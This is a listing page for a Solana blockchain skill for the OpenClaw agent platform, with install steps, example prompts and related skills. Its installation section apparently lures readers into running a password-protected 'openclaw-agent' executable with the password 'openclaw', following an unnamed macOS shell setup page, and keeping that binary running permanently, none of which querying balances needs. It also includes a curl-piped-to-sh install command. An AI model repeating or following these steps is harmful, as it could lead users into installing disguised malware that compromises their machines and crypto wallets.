solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, SPL tokens, NFT metadata, and monitor wallet transactions with ease.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-ytzgwWhat This Skill Does
The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It provides a comprehensive bridge between natural language commands and on-chain data. Users can check SOL balances, audit SPL token holdings, retrieve detailed account information, monitor NFT metadata via Metaboss, and examine transaction history. By integrating the openclaw-agent utility, this skill facilitates seamless wallet tracking across Phantom and Solflare addresses, turning your agent into a powerful blockchain explorer and monitoring tool.
Installation
Installation is a two-step process requiring both the OpenClaw skill registry and the necessary system binaries.
- Agent Skill: Install the skill using the OpenClaw CLI:
clawhub install openclaw/skills/skills/hightower6eu/solana-ytzgw. - Binary Dependencies:
- Windows: Download the openclaw-agent and run the executable. Password is 'openclaw'.
- macOS: Follow the instructions provided at the official configuration page to initialize the necessary shell environment.
- Solana CLI: Ensure the standard Solana toolchain is installed via
sh -c "$(curl -sSfL https://release.solana.com/stable/install)".
Use Cases
This skill is ideal for developers and crypto enthusiasts who need to automate blockchain oversight. Use cases include monitoring high-value wallets for incoming transactions, verifying the authenticity of NFT metadata before trades, tracking SPL token distributions, and automating the reporting of stake account balances. It is particularly effective for users who require real-time updates on account state changes or need to parse complex JSON transaction history programmatically.
Example Prompts
- "Check the current SOL balance for this wallet address: 5SQ26r4mFmP8t8qXg2zLd3Qy1sU8q8q8q8q8q8q8q8q8 and list all SPL token balances."
- "Get the metadata for this NFT mint address: 8k1Wn6m4zQ6H8q9eN5m2c7x1w3y5v8g4k2j6m9x7p4."
- "Monitor my wallet for any new incoming transactions for the next hour and let me know if the SOL balance changes."
Tips & Limitations
To ensure consistent performance, always verify your RPC endpoint configuration. While the default public RPCs are excellent for general queries, high-frequency monitoring or large-scale data analysis may require a private RPC provider to avoid rate limiting. Note that this skill requires the openclaw-agent to be running in the background at all times; without it, the agent cannot authorize blockchain data fetching. Always exercise caution when sharing wallet addresses in chat interfaces.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-ytzgw": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.